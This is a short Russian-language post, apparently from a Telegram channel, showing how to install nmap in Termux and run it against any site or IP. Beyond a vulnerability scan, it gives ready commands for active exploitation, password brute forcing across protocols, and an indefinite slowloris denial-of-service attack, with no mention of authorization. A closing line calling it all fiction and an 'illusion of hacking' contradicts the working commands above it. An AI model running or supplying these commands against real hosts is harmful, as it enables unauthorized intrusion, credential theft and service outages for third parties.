Nmap
@onlypintestsШалом друзья, я бы хотел показать такую утилиту как nmap. Его очень легко установить.
Установка
заходим в термукс и пишем:
pkg install nmap
Ждём установки и вот все готово. Можно приступать к тесту сайтов).
Я пожалуй запущу пинтест на мой созданный хост (при помощи serveo).
nmap -Pn --script vuln <target.com or ip>
Вот вся команда.
Как вы видите мой временный хост не имеет уязвимостей.
А если она есть то приступаем к другому методу под названием...
Использование NMAP для активной эксплуатации обнаруженных уязвимостей
Вот и вся команда: nmap --script exploit -Pn <target.com or ip>
Все легко и просто.
Использование NMAP для перебора паролей
Nmap содержит сценарии для перебора паролей десятков протоколов, включая http-brute, oracle-brute, snmp-brute и т. д. Используйте следующую команду для выполнения атак методом перебора, чтобы угадать учетные данные аутентификации удалённого сервера.
nmap --script brute -Pn <target.com or ip>
Также все легко.
Использование NMAP, для проверки, является ли цель уязвимой для DOS
Используйте следующую команду, чтобы проверить, уязвима ли цель к DoS:
nmap --script dos -Pn <target.com or ip>
Результат выполнения этой команды скажет вам, является ли цель уязвимой без фактического запуска DOS-атаки.
Использование NMAP для выполнения атаки DOS
Используйте следующую команду для выполнения активной DoS-атаки на цель в течение неопределенного периода времени:
nmap --max-parallelism 750 --script http-slowloris --script-args http-slowloris.runforever=true <target.com or ip>
Это все выдумка этого не существует. Это все илюзия взлома. Нечего такого не бывает.